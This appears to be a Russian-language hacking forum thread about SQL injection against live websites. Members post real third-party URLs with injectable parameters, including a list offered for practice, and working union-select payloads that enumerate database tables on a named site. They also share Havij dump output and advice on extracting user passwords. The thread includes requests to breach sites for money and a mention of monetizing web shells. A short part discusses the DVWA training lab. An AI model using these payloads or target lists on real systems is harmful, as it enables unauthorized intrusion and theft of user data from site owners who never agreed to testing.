это может как то по другому крутить надо..а то у меня станадртно все как по уроку тохи все..)

Первый раз наткнулся на кое что этакое..Собственно ошибочка

code:

http://www.astrakhanfm.ru/news/news.php?id=28074'

Как только что то пытаешься сделать дальше..
Проблема с загрузкой страницы..оО как так??

Часто ошибка не вылезает,но пропадает часть информации.
И можно ручками перебирать кол-во таблиц...

Цитата:

Сообщение от Rolexx93

Первый раз наткнулся на кое что этакое..Собственно ошибочка

code:

http://www.astrakhanfm.ru/news/news.php?id=28074'

Как только что то пытаешься сделать дальше..
Проблема с загрузкой страницы..оО как так??

PHP highlight



Предупреждение

http://localhost/news.html?id=28074+order+by+2--





Это уже особенность сайта

Всем привет, форумчане)) Наткнулся на форум, лазил по страницам, я ничего не делал, но на одной странице вылезла эта ошибка
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

Просто из ниоткуда взялась! я сначала подумал, что это инклуд, сатл раскручивать, но страница вернулась в чистое положение! Случайно подставил кавычку, и ..опа..снова вылезла эта ошибка.! хотел узнать версию БД, изменилась только строчка в ошибке(выделена красным) , дальше стал крутить, и все изчезло, и снова страница не реагирует на команды!
Кто сможет подсказать, в какую сторону двигаться, и как назвать эту свистопляску с форумом? PHPbb-это вроде самописный движок?!

Genua, смотри данные, которые отправляет браузер в запросе перед появлением ошибки. Скорее всего, ты никак не можешь повлиять на то, что делает скрипт в данном случае (то есть на то, что запращивает file_get_contents).

M@ZAX@KEP, а где смотреть эти данные?

Genua, для Firefox есть плагин TamperData. Но если в ссылке (в GET запросе) ничего интересного не видно и форм ты никаких не отправлял (POST запросов), то можно и без всяких плагинов разобраться и сделать выводы что на запрос, а соответственно и на ошибку, мы не влияем. =)

Ребят в чем проблема? смотрите все делаю по видео правильно нашел юзера и начинаю пытаться узнать пароль выдает ошибку

Экстрасенсов видел тут? Я нет.

www.farit.ru (https://hpc.name/redirector.html#http://www.farit.ru) кто взломает базу данных с логинами и паролями того зауважаю как реального хакера!!!!!!!!!!!

Цитата:

Сообщение от furyanes

кто взломает базу данных с логинами и паролями того зауважаю как реального хакера!!!!!!!!!!!

Самое важное, что не хватает всем юзерам на этом форуме - это получить твоё уважение! Без него юзер - не юзер.
Так что все, кто прочитал твоё сообщение, уже ломанулись сливать для тебя базу. Так что жди О, Великий!

Тема обсуждения sql - injection а не просьб выполнить что-то, для подобных просьб существуют другие темы.

Цитата:

Сообщение от furyanes

www.farit.ru (https://hpc.name/redirector.html#http://www.farit.ru) кто взломает базу данных с логинами и паролями того зауважаю как реального хакера!!!!!!!!!!!

Переведи мне на WM 1к $ и тогда я буду считать тебя самым чотким пасоном в РФ!

Выжал через Havij всё что мог

source:


Target:[url]http:
/
/
www
.1
pixel.ru
/
view_sindicate2.php?id
=
173
[
/
url]
Host IP:
127.0
.0
.1
Web Server: nginx
DB Server: MySQL
>=
5
Resp.
Time
(avg):
305
ms
Current
User
: pixd
@localhost
Sql
Version:
5.0
.67
Current
DB: grinale7_1pixl
System
User
: pixd
@localhost
Host Name: msk
-
f148
Installation dir:
/
usr
/

Не большая "валидная подборка" что бы руку набить:

source:


http://www.nissi-beach.com/article.php?
id
=18
http://www.sfskids.org/templates/home.asp?pageid=1
http://www.evt-me.com/newsDetail.php?
id
=8
http://www.cbmin.org/cbm/staff?staff_id=10
http://lhim.org/humor/humor.php?
id
=58
http://www.thaizucht.de/thaikatzen-frm-gallery-items-showf-humor.php?
id
=75
http://www.a-k-a.net/prod_detail.php?
id
=2

http://lux-time.ru/vote.php?id=1026 (https://hpc.name/redirector.html#http://lux-time.ru/vote.php?id=1026) вот еще

Подскажите плиз, если в строке поиска ввести кавычку и выводится такое:

SQl highlight


MySQL Error
!
------------------------
The Error returned was:
You have an error
in
your
SQL
syntax;
check
the manual that corresponds
to
your
MySQL server version
for
the
right
syntax
to
use near
'%'
or
dle_photo_post.name
like
'%'
%
' or dle_photo_post.des like '
%
'%'
or
dle_p
' at line 2

Error Number:
1064


source:


____
____
____
____
____
____
____
____
____
____
____
____
____
____
____
____
____
____
____
SELECT dle
_photo_
post.
* FROM dle_photo_post LEFT JOIN dle_photo_alboms
ON dle_photo_post.albom = dle_photo_alboms.id WHERE (
dle_photo_post.id like '%'%' or dle_photo_post.name like '%'%' or
dle_photo_post.des like '%'%' or dle_photo_post.date like '%'%' or
dle_photo_post.comms like '%'%' or dle_photo_post.author like '%'%' or
dle_photo_post.albom like '%'%' or dle_photo_post.file like '%'%' or
dle_photo_post.look like '%'%' or dle_photo_post.tegs like '%'%' or
dle_photo_post.rating like '%'%' ) and (dle_photo_post.show = 0 or
dle_photo_post.show < 1339927454) and (dle_photo_post.hide = 0 and
dle_photo_post.moder = 0)ORDER BY dle_photo_post.date DESC
__________________________________________________ ____________________________


Это sql inj? Вроде как фильтрация отсутствует...
Движок DLE < 9.

gerrpilligrim ДА

hugolom, то есть мне действовать по той же схеме toXa? Все точно также, просто вводить в поиск, а не в адресную строку? Пытаюсь вбить команды, он просто пишет "нет результатов", не выводя вообще никакой ошибки. Это получается в слепую подбирать? Или там ошибка фильтрации может только на кавычку идти, а на плюс и прочее работает(фильтрация работает в смысле на +).

покажи ссылку

Уже скинул в личку. Хотя если надо, могу и сюда.

Я вот одного не понял, откуда взяли Users? я сейчас перебрал всё что мог и вышло только Humor Corner: USER_PRIVILEGES
полная ссылка http://lhim.org/humor/humor.php?id=-...s+limit+15,1-- (https://hpc.name/redirector.html#http://lhim.org/humor/humor.php?id=-58+union+select+1,table_name,3,4,5,6,7+from+inform ation_schema.tables+limit+15,1--) что не так делаю?

Цитата:

Сообщение от Nobody4all

Вместо table_name напиши group_concat(table_name)

Ниже советовали это, поэкспериментируй.

Цитата:

Сообщение от gerrpilligrim

Ниже советовали это, поэкспериментируй.

при вводе group_concat(table_name),3,4,5,6,7+from+informatio n_schema.tables+limit+ **,*--
таже фигня, даже порой и хуже, так как не отображает не users и вообще ничего нет

http://lhim.org/humor/humor.php?id=-...s+limit+55,1-- (https://hpc.name/redirector.html#http://lhim.org/humor/humor.php?id=-58+union+select+1,table_name,3,4,5,6,7+from+inform ation_schema.tables+limit+55,1--)
Вот твоя искомая табличка...

слушайте,вывел таблицы. 5 ветка.но найти Users не могу?.
только привилегий
http://lhim.org/humor/humor.php?id=-...s+limit+15,1-- (https://hpc.name/redirector.html#http://lhim.org/humor/humor.php?id=-58+union+select+1,table_name,3,4,5,6,7+from+inform ation_schema.tables+limit+15,1--)

Раскручиваю сайт с помощью Havij но почему то на некоторых пользователей не выводятся пароли. С чем это может быть связанно?

С тем, что надо ручками раскручивать. Тогда сразу все понятно станет, почему не выводятся.

подскажите это является sql инъекцией?
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and (select count(*) from market_mods where cat=cats.id and (pcat='28' or pcat='' at line 1

Цитата:

Сообщение от wolf123

подскажите это является sql инъекцией?
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and (select count(*) from market_mods where cat=cats.id and (pcat='28' or pcat='' at line 1

Возможно и является. Пробовал дальше крутить?

пробую, пока что без результатно(

Цитата:

Сообщение от wolf123

пробую, пока что без результатно(

Havij тоже результатов толковых не выдает? Кинь мне ссылку в ЛС, посмотрю, что да как.

помогите раскрутить!

source:


http://www.global-money.com/item.php?
id
=173


Havij безпомощен

что означает этот код?

code:

SELECT c.*, ch.gmt, u.username, u.moder, ch.race FROM comments c LEFT JOIN `character` ch ON ch.id = c.author LEFT JOIN `users` u ON u.id = c.author WHERE c.article_id = "67" LIMIT -10,10 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10,10' at line 1

ошибка в лимите

[Экстрасенс mode ON]
panfilov91, на том сайте, где ты это увидел, не скуля, а просто косяк в запросе. Можешь легко в этом убедиться, так как запрос там целиком выводится в ошибке. Подставляешь что угодно в тот параметр, в котором ты думал, что нашёл скулю, и видишь, что ничего в запрос не попадает.

Цитата:

Сообщение от M@ZAX@KEP

[Экстрасенс mode ON]
panfilov91, на том сайте, где ты это увидел, не скуля, а просто косяк в запросе. Можешь легко в этом убедиться, так как запрос там целиком выводится в ошибке. Подставляешь что угодно в тот параметр, в котором ты думал, что нашёл скулю, и видишь, что ничего в запрос не попадает.

M@ZAX@KEP, это проигрышный вариант?
Сделать ничего нельзя?

Приветствую.
Есть сайт. На нём скуль (КЭП не дремлет!). Сканирование и подстановка кавычки, выдаёт ошибку. Вот только кроме ошибки, я ничего не могу выудить. Вроде как слепая инъекция (?). Через тулзу SQL Helper, выдалась и база, и таблицы, и всё, кароче =)
Вот только юзеров нет, а рега есть. Да и в таблицах указаны ники, мыла, а вот таблицы с данными аутентификации нет.
Вопрос: если данные про юзверей льются куда-то ещё, то как добраться до этого самого ещё?

Цитата:

Сообщение от _Werewolf_

Вопрос: если данные про юзверей льются куда-то ещё, то как добраться до этого самого ещё?

Может они записываются совсем в другую БД, которая под другим юзверем | которая имеет особенные права? - ищи уязвимость в авторизации | регистрации
На 100% уверен, что система юзверей работает с БД?

Цитата:

Сообщение от ZoRKeG

Может они записываются совсем в другую БД

Благодарю, КЭП!

Цитата:

Сообщение от ZoRKeG

которая под другим юзверем | которая имеет особенные права? - ищи уязвимость в авторизации | регистрации.

Всё может быть, только зачем так заморачиваться... База есть, куда пишут всякую фигню типо комментов, все, обычно, туда же льют и данные авторизации.

Цитата:

Сообщение от ZoRKeG

На 100% уверен, что система юзверей работает с БД?

Нет, но вариантов, думаю, немного.

Цитата:

Сообщение от _Werewolf_

Благодарю, КЭП!

Всё может быть, только зачем так заморачиваться... База есть, куда пишут всякую фигню типо комментов, все, обычно, туда же льют и данные авторизации.

Нет, но вариантов, думаю, немного.

Пробуй раскрутить ручками, а программа может сама по себе давать сбои.

Цитата:

Сообщение от ZoRKeG

Пробуй раскрутить ручками, а программа может сама по себе давать сбои.

Дошёл мой месседж? Я же написал:

Цитата:

Сообщение от _Werewolf_

Вот только кроме ошибки, я ничего не могу выудить.

Какие бы запросы и комбинации я не вводил, выводил либо ошибку, либо вообще ничего.
P. S. Let's chat, so talk.

Цитата:

Сообщение от _Werewolf_

Дошёл мой месседж? Я же написал:
Цитата:

Цитата:

Сообщение от _Werewolf_

Вот только кроме ошибки, я ничего не могу выудить.

Если программа смогла вытянуть - почему бы простому смертному не вытащить?

Цитата:

Сообщение от _Werewolf_

P. S. Let's chat, so talk.

Сейчас не могу, скоро буду вылетать -)

Цитата:

Сообщение от ZoRKeG

Если программа смогла вытянуть - почему бы простому смертному не вытащить?

Ха, кагбэ именно с этим вопросом, я и обратился сюда - почему прога вытянула, а я - нет?

Цитата:

Сообщение от ZoRKeG

Сейчас не могу, скоро буду вылетать -)

Угу, давай, главное парашют не забудь =)

Приветствую.
Есть такая интересная проблема:
Существует тулза DVWA, которая тренирует в разных уязвимостях, там есть три уровня сложности, на первом SQLInj провести легко, а вот на остальных... Есть две фильтрующие функции - stripslashes && mysql_real_escape_string. Раз они юзаются в такой площадке, то их можно обойти, только на сложном уровне.
Пока рою инфу, но чойта не нахожу обхода. Прошу помощи =)

_Werewolf_, ну, говно вопрос, шифруем запрос и отправляем в атаку его (:

Зорг, я, безусловно, рад что ты так ценишь мои вопросы, но все жё если бы я знал метод шифрования, то не спрашивал бы =)

Цитата:

Сообщение от _Werewolf_

Зорг, я, безусловно, рад что ты так ценишь мои вопросы, но все жё если бы я знал метод шифрования, то не спрашивал бы =)

Попробуй курнуть информацию про слепую инъекцию

Цитата:

Сообщение от ZoRKeG

Попробуй курнуть информацию про слепую инъекцию

Разумеется, я попробую спросить - нах?

Цитата:

Сообщение от _Werewolf_

Разумеется, я попробую спросить - нах?

Я пробую спросить - нах тебе это дело? Откуда такие глупые вопросы то?
Как я понял - это дело не по тебе, если сейчас ужасно тупишь, то я молчу про те мануалы, которые писал тебе про монетизацию шелла, тебя, скорей всего, быстрей поймают и попку прочистят, чем ты заработаешь сотку рублей.

Чувак, ты знаешь что сейчас ночь, я убилсо за день, мозги не варят, поэтому весь бред я генерирую сейчас. Наверняка я завтра пойму как это делать (банально в HEX закодировать =)), но хочу спросить сейчас.
И не пали тему =) Никто меня не найдёт, я призрак для всего официального, да и пока не до этой темы.

Цитата:

Сообщение от _Werewolf_

Чувак, ты знаешь что сейчас ночь, я убилсо за день, мозги не варят, поэтому весь бред я генерирую сейчас. Наверняка я завтра пойму как это делать (банально в HEX закодировать =)), но хочу спросить сейчас.
И не пали тему =) Никто меня не найдёт, я призрак для всего официального, да и пока не до этой темы.

HEX, не HEX, но сначала поюзай ASCII(), CHAR(). Да, и кстати, ты задал вопрос на который сам дал ответ, так что, вопрос сам по себе был бредовым, согласись.
А про то, что голова не варит, ну, как тебе сказать, я сегодня тоже целый день работал, да и если набухаюсь наотмечаюсь то даже в таком состоянии буду замечательно действовать в этих делах, да и не думаю, что сегодня ты на столько утомительной работой работал, что не можешь загуглить пару фраз и прочитать парочку мануалов, а значит с твоей стороны летит 100 и 1 отмазка (:
P.S. найти можно каждого, было бы желание.

Чувак, я тебе уже сказал что я сижу брежу, надо отправить тело спать, а я нет - несу бред и мне это нравиться =)
Отмазка - это да, люблю их.
Про это кодирование знаю, даже когда-то скрипт писал, чтобы в уме не кодировать :cool:

Короче, проблему решили, отвечать мне не нужно =)
Хотя если есть оригинальные способы - прошу =)

Цитата:

Сообщение от _Werewolf_

Есть две фильтрующие функции - stripslashes && mysql_real_escape_string. Раз они юзаются в такой площадке, то их можно обойти, только на сложном уровне.

А вот нет Зря мучаешься. На сложном уровне показано, как правильно писать защищённый код))

Цитата:

Сообщение от M@ZAX@KEP

А вот нет Зря мучаешься. На сложном уровне показано, как правильно писать защищённый код))

Если знать как работают эти скули - можно и самому догадаться как написать неуязвимый кол)

Женщина писала что лЕ? Ну логики что-то нет.
Тогда так неинтересно - я только сложный уровень не могу пройти.

Прошу извинить, что не в том разделе. Вижу, что тема активная, а люди здесь знающие
Нужно взломать пару сайтов на hostcms, само собой за деньги. Главная задача - чтобы сайты выпали из выдачи. Наебщ..в прошу не беспокоить

Цитата:

Сообщение от capitan2014

Прошу извинить, что не в том разделе. Вижу, что тема активная, а люди здесь знающие
Нужно взломать пару сайтов на hostcms, само собой за деньги. Главная задача - чтобы сайты выпали из выдачи. Наебщ..в прошу не беспокоить

Поставил бы сайты под хайд... чтоб посмотреть можно было что они из себя представляют. А там тебе уже скажут, возможно ли это и кто за это возьмется.

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.

Господа, подскажите как расколупать ручками.

http://www.atmarine.fi/index.php?id=1 (https://hpc.name/redirector.html#http://www.atmarine.fi/index.php?id=1)
http://www.f10products.co.za/index.php?id= (https://hpc.name/redirector.html#http://www.f10products.co.za/index.php?id=)

Две простых скули. Но у меня не получается определить столбцы. Хавидж и Скулимап крякают за секунду.
Как определить количество столбцов и продолжить иньекцию ? Я пробовал Order+by, Union+select, Group+by .. Но на то количество столбцов которое показывает Хавидж нет никакой реакции.. хоть 1000.. Пробовал с null, limit .. Подскажите с объяснением пожалуйста.